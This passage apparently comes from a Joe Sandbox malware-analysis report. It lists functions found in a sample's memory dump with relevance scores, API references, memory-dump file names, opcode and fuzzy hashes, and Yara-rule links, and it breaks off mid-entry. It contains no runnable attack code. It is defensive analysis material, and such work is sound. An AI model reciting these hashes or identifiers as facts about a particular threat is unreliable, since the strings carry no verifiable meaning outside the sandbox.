                                                                                                                                        • Instruction ID: 2409e6f74592f1628a442ad4128be0aac4ff64fb952bce6e785a88b650d106ce
                                                                                                                                        • Opcode Fuzzy Hash: 4d9484f7893c98b18c100cc74205f7ed0df5666d023da78245adcbfc6967603c
                                                                                                                                        • Instruction Fuzzy Hash: 23F012B4D002189BCB28CF54EC42AE573B5F755324F118299D91953350D678AD808E96
                                                                                                                                        Function 007ADBC3 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,007AD604), ref: 007ADBC8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: 05e14cbfca60f8cbaf25b8864041176c20bddd1b01fca855136ae6224259a8cb
                                                                                                                                        • Instruction ID: fa37f05ddfd4d0a789952c69c0f3bad842ff3b1ef7fbec14eeb4eb32fee425c1
                                                                                                                                        • Opcode Fuzzy Hash: 05e14cbfca60f8cbaf25b8864041176c20bddd1b01fca855136ae6224259a8cb
                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                        Function 0079DBE2 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8|
                                                                                                                                        • API String ID: 0-531956219
                                                                                                                                        • Opcode ID: 88b111e24a1d327fdb4e918cc4c419177300057aef412cab6472039858b017ee
                                                                                                                                        • Instruction ID: 02b0e16c5fb22cdbd12acbfbccbb42c204199140051f74526c910af4e2ecbfaa
                                                                                                                                        • Opcode Fuzzy Hash: 88b111e24a1d327fdb4e918cc4c419177300057aef412cab6472039858b017ee
                                                                                                                                        • Instruction Fuzzy Hash: 8751D77160C3954ECB21CF29D1844AEBFE1AFDB314F49499EE4D54B253C138DA49CB62
                                                                                                                                        Function 007B8AAA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                        • Opcode ID: 2d684ad6d5272e10f11a3e9f1bff15b2c0cceb0f5c7d33d8629cb6fdfd23546e
                                                                                                                                        • Instruction ID: 85dc22007bd64cab6c12d9b76c4fd071ab67eba76fd5cb04a02c258a8689ad37
                                                                                                                                        • Opcode Fuzzy Hash: 2d684ad6d5272e10f11a3e9f1bff15b2c0cceb0f5c7d33d8629cb6fdfd23546e
                                                                                                                                        • Instruction Fuzzy Hash: D8A02430103140CF53004F355F0730D3FD4F5053C0705C01C5004C5130D73C40004745
                                                                                                                                        Function 007A4FB5 Relevance: .8, Instructions: 800COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                                                                        • Instruction ID: 2117d31aee524333c0442ba45b3e49393edf297c435f80f07c5f8e323e9ff7d1
                                                                                                                                        • Opcode Fuzzy Hash: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                                                                        • Instruction Fuzzy Hash: AB62E971604B85DFCB29CF38C8906BAB7E1AFD6304F04866DD99A8F346D638E945CB50
                                                                                                                                        Function 007A63F2 Relevance: .8, Instructions: 773COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                                                                        • Instruction ID: 4485450ec29ef61aad0be87ab05e250e40e368027ce5b5a989f7c0b80145f5d9
                                                                                                                                        • Opcode Fuzzy Hash: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                                                                        • Instruction Fuzzy Hash: 6C6213B16047869FC719CF28C8905B9BBE0FB96304F18876DD99687742E738F955CB80
                                                                                                                                        Function 0079E045 Relevance: .7, Instructions: 694COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                                                                        • Instruction ID: 549a0903f30c6d4b82d56b7a05a8d9e7d1d59bde3fb7ed1294cd23b872e10c39
                                                                                                                                        • Opcode Fuzzy Hash: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                                                                        • Instruction Fuzzy Hash: E85249B26047019FC758CF18C891A6AF7E1FFC8304F49892DF5969B255D734E919CB82
                                                                                                                                        Function 007A5DB9 Relevance: .5, Instructions: 509COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 000614300bbc084e730df5b79e8a30e1091d8729c9733be97e5edc6764652691
                                                                                                                                        • Instruction ID: 3c73c83ee1f1ecb67038fd10e63d6926d6d8237ad225baf31f2bd87ad51db931
                                                                                                                                        • Opcode Fuzzy Hash: 000614300bbc084e730df5b79e8a30e1091d8729c9733be97e5edc6764652691
                                                                                                                                        • Instruction Fuzzy Hash: 2A12D5B1604B068FC728CF28C8D4679B7E1FF95304F148A2DE597C7A81E778A895CB45
                                                                                                                                        Function 0079BA1A Relevance: .4, Instructions: 449COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 692e6ae63397fef501387f6de6a31a1502ee1e504e2283c02cc8111dd741a8db
                                                                                                                                        • Instruction ID: f7f32cd597bf2d09755481bf1151f8b5248c2cfb1b63a985878a04b6c43b3af6
                                                                                                                                        • Opcode Fuzzy Hash: 692e6ae63397fef501387f6de6a31a1502ee1e504e2283c02cc8111dd741a8db
                                                                                                                                        • Instruction Fuzzy Hash: EBF19971A083458FCB14CF29E68866ABBE2FFC9714F144A2EF48687355D738E905CB52
                                                                                                                                        Function 007AF693 Relevance: .3, Instructions: 345COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                        • Instruction ID: 6d5bc67080287d2babce9e3ef69cf636c550ebdb312cec9257aec2757315f60b
                                                                                                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                        • Instruction Fuzzy Hash: FAC16D362051930ADB2D46BA857423EBEA16EE37B131A077ED4B7CB1D4FF28D524D620
                                                                                                                                        Function 007AFAC8 Relevance: .3, Instructions: 341COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                        • Instruction ID: d396e7518d4cf255f1540f23aa8d568a10384a90f9806ff5cd340ecfc7b770dc
                                                                                                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                        • Instruction Fuzzy Hash: 35C170362091930ADF2D46BAC57413EBEA16AE37B131A077DD8B6CB1D5FF28C524D620
                                                                                                                                        Function 007AF25E Relevance: .3, Instructions: 331COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                        • Instruction ID: bc35c5841dcd3a59adf2d639bcaba822454e5be64e58cc84435a06efb543e6e1
                                                                                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                        • Instruction Fuzzy Hash: D3C16E362051930ADF6D86BA857413EBEA16AE37B131A077DD8B6CB1D4FF28C524D620
                                                                                                                                        Function 007AEE46 Relevance: .3, Instructions: 323COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                        • Instruction ID: ec8e9f2d0c43aa9a62996170bec558de6f343d7e776103d4c54ab6a2a52ca814
                                                                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                        • Instruction Fuzzy Hash: EEC18E362090930ADF6D46BAC57413FBEA16AE37B131A077DE4B6CB1C5FF28C5249620
                                                                                                                                        Function 0079D5E4 Relevance: .3, Instructions: 318COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fc9d7e2b6bc5dd12dddbc66145287a0d1581cdd09b3adf6fc649f582f5564823
                                                                                                                                        • Instruction ID: 734c0e2a77d7ce083f6e612aea2fc59f3c173648279f37e4c367109fbbb8add7
                                                                                                                                        • Opcode Fuzzy Hash: fc9d7e2b6bc5dd12dddbc66145287a0d1581cdd09b3adf6fc649f582f5564823
                                                                                                                                        • Instruction Fuzzy Hash: 3DE148755093808FC344CF29D89496ABBF0EFCA300F89895EF5D597362C238E955CBA6
                                                                                                                                        Function 007A2DB5 Relevance: .3, Instructions: 263COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                                                                        • Instruction ID: ffab465961c3e3ff09ecdca39d940ae278f02557929bd80425a938c39ac01441
                                                                                                                                        • Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                                                                        • Instruction Fuzzy Hash: E59149B0204745DBDB24EF6CD899BBE73D5ABD2300F100A2DF59687283EA7C9645C752
                                                                                                                                        Function 007B2B78 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cd278409d6a8e2949a186f0bbcac686eac1075f4d8c5a532710484d97cea2f8e
                                                                                                                                        • Instruction ID: af8af4de6fd8d7b19c8df95345cd6e39c1228d0fa51eef00c956aca53f63204e
                                                                                                                                        • Opcode Fuzzy Hash: cd278409d6a8e2949a186f0bbcac686eac1075f4d8c5a532710484d97cea2f8e
                                                                                                                                        • Instruction Fuzzy Hash: CD618BB1702708A6DF385E288859BFF7794EF15740F240919E842DB293EA1DED878366
                                                                                                                                        Function 007A30E6 Relevance: .2, Instructions: 232COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                                                                        • Instruction ID: 35033b9f2e48e3ca7c6a0d581c6d85644f2937860394d45504f5002426d1285b
                                                                                                                                        • Opcode Fuzzy Hash: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                                                                        • Instruction Fuzzy Hash: 8B7129712047859BDF24DF6CD8D8BAD37D1ABD3304F000A2DF9868B282DA7C9A858756
                                                                                                                                        Function 0079D1D2 Relevance: .2, Instructions: 190COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fa36f9d1ca8a6937612d6a12122413e34f5bf3f4e6766a93bddb4e73c2bde942
                                                                                                                                        • Instruction ID: 20fe86fa1ce7bc351cd4025024ebb470a9a3ee1e494ec93902d45036dc2c4e86
                                                                                                                                        • Opcode Fuzzy Hash: fa36f9d1ca8a6937612d6a12122413e34f5bf3f4e6766a93bddb4e73c2bde942
                                                                                                                                        • Instruction Fuzzy Hash: 5F81AE9221A6D4AEC7164F3D38E42E93FB15777341F1C84ABD4C5862B3C03E8A58D76A
                                                                                                                                        Function 0079EC97 Relevance: .1, Instructions: 131COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
